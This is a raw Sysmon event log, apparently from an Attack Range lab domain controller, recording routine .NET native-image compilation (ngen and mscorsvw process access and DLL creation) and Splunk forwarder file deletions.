21:05:04.942{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3D04-00000000CF01}5748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021311Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.926{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3D04-00000000CF01}5748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021310Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.926{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3D04-00000000CF01}5748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021309Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:04.880{4DB9351A-A200-60D3-3C04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19fc-0\PresentationFramework-SystemDrawing.dll2021-06-23 21:05:04.880 23542300x800000000000000021308Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.833{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDF787ADEFE465139F8F5031AB3D2F25,SHA256=DB862E9CB84C4D404430309F86D8A75D709C8B7084E3344C97FBDDD702D3710A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021307Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3C04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021306Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.755{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3C04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021305Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.755{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3C04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021304Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3B04-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021303Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.708{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3B04-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021302Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.708{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3B04-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021301Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:04.630{4DB9351A-A200-60D3-3A04-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18c4-0\PresentationFramework-SystemData.dll2021-06-23 21:05:04.630 10341000x800000000000000021300Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.583{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3A04-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021299Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.567{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3A04-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021298Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.567{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3A04-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021297Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.520{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3904-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021296Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.505{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3904-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021295Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.505{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3904-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021294Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:04.458{4DB9351A-A200-60D3-3804-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1654-0\PresentationFramework-SystemCore.dll2021-06-23 21:05:04.458 10341000x800000000000000021293Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.395{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3804-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021292Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.380{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3804-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021291Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.380{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3804-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021290Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.301{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3704-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021289Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.286{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3704-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021288Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.286{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3704-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021287Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:04.176{4DB9351A-A1FF-60D3-3604-00000000CF01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bec-0\PresentationBuildTasks.dll2021-06-23 21:05:04.176 23542300x800000000000000021286Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.083{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=653754779A03447FA5D525B6BB2976AD,SHA256=BE5C1FE0E7D772E1B8849642B14931E9F7B3082D0B41469C832653A6B5A34FD7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021338Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 